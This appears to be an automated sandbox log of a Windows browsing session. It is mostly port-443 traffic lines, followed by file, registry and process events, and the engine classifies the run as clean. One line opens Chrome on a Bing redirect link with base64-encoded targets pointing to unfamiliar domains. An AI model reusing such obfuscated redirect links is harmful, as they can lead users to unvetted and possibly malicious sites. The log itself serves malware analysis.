Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.114.178.124:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: classification engineClassification label: clean3.win@33/401@53/16
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.desktopappinstaller_8wekyb3d8bbwe\AC\Temp\APPX.iseeii9_v5n0k_yirxwdxh5bf.tmpJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,5674330579086661350,10920090368458916979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/"
Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2028,i,5674330579086661350,10920090368458916979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
